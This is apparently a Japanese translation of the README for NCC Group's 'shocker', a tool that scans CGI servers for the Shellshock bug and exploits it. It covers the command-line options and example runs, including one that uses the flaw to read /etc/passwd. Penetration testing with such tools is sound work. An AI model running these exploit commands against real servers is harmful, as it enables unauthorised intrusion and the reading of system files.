
Shellshockに対して脆弱なサーバーを発見し、悪用するためのツール
Shellshock脆弱性のあるサーバーを発見し、悪用するためのツール
Ref: https://en.wikipedia.org/wiki/Shellshock_(software_bug)
NCC Group Plc によりオープンソースとして公開 - https://www.nccgroup.trust/
開発者:
https://github.com/nccgroup/shocker
AGPLのもとでリリースされています。詳細はLICENSEを参照してください。
使用方法: shocker.py
-h, --help このヘルプメッセージを表示して終了
--Host HOST, -H HOST ターゲットのホスト名またはIPアドレス
--file FILE, -f FILE ターゲットのリストを含むファイル
--port PORT, -p PORT ターゲットのポート番号(デフォルト=80)
--command COMMAND 実行するコマンド(デフォルト=/bin/uname -a)
--cgi CGI, -c CGI チェックする単一のCGI(例: /cgi-bin/test.cgi)
--proxy PROXY 現在少し壊れています 'ip:port' 形式で使用するプロキシ
--ssl, -s SSLを使用する(デフォルト=False)
--threads THREADS, -t THREADS 最大スレッド数(デフォルト=10、最大=100)
--verbose, -v 出力を詳細にする
./shocker.py -H 127.0.0.1 --command "/bin/cat /etc/passwd" -c /cgi-bin/test.cgi
http://127.0.0.1/cgi-bin/test.cgi をスキャンし、見つかった場合に /etc/passwd をcatしようと試みます。
./shocker.py -H www.example.com -p 8001 -s
www.example.com をポート8001でSSLを使用してスキャンし、cgi_list内のすべてのスクリプトに対してデフォルトのエクスプロイトを試みます。
./shocker.py -f ./hostlist
ファイル ./hostlist にリストされたすべてのホストをデフォルトオプションでスキャンします。
Python 2.7+
バージョン1.1の変更点(2018年6月)
バージョン1.0の変更点(2016年3月)
バージョン0.72の変更点(2014年12月)
バージョン0.71の変更点(2014年12月)
バージョン0.7の変更点(2014年11月)
バージョン0.6の変更点(2014年10月)
バージョン0.5の変更点(2014年10月)
バージョン0.4の変更点(2014年10月)
0.4以前(2014年10月)
NCCのAnthony Caulfield氏、初期バージョンのレビューに時間と労力を費やしてくれたことに感謝
NCCのBrendan Coles氏、支援と貢献に感謝